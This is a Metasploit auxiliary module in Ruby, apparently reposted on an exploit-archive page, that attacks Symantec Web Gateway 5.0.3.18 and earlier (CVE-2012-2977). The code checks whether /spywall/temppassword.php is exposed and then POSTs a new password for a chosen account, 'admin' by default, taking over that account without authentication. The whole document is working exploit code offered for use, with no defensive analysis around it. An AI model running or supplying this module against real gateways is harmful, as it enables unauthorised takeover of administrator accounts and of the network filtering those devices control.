## # @_Kc57 # Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change", 'Description' => %q{ This module will change the password for the specified account on a Symantec Web Gatewaye server. }, 'License' => MSF_LICENSE, 'Version' => "$Revision: 0 $", 'Author' => [ 'Kc57', ], 'References' => [ [ 'CVE', '2012-2977' ], [ 'OSVDB', '0' ], [ 'BID', '54430' ], [ 'URL', 'http://www.securityfocus.com/bid/54430' ], ], 'DisclosureDate' => "Jul 23 2012" )) register_options( [ Opt::RPORT(80), OptString.new('USER', [ true, 'The password to reset to', 'admin']), OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin']) ], self.class) end def run print_status("Attempting to connect to https://#{rhost}/spywall/temppassword.php to reset password") res = send_request_raw( { 'method' => 'POST', 'uri' => '/spywall/temppassword.php', }, 25) #check to see if we get HTTP OK if (res.code == 200) print_status("Okay, Got an HTTP 200 (okay) code. Checking if exploitable") else print_error("Did not get HTTP 200, URL was not found. Exiting!") return end #Check to if the temppassword.php page loads or if we are redirected to the login page if (res.body.match(/Please Select a New Password/i)) print_status("Server is vulnerable!") else print_error("Target doesn't seem to be vulnerable!") return end print_status("Attempting to exploit password change vulnerability on #{rhost}") print_status("Attempting to reset #{datastore['USER']} password to #{datastore['PASSWORD']}") data = 'target=executive_summary.php' data << '&USERNAME=' + datastore['USER'] data << '&password=' + datastore['PASSWORD'] data << '&password2=' + datastore['PASSWORD'] data << '&Save=Save' res = send_request_cgi( { 'method' => 'POST', 'uri' => '/spywall/temppassword.php', 'data' => data, }, 25) if res.code == 200 if (res.body.match(/Thank you/i)) print_status("Password reset was successful!\n") else print_error("Password reset failed! User '#{datastore['USER']}' may not exist.\n") end else print_error("Password reset failed!") end end endБрой прочитания на тази страница: 755
Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change (MSF)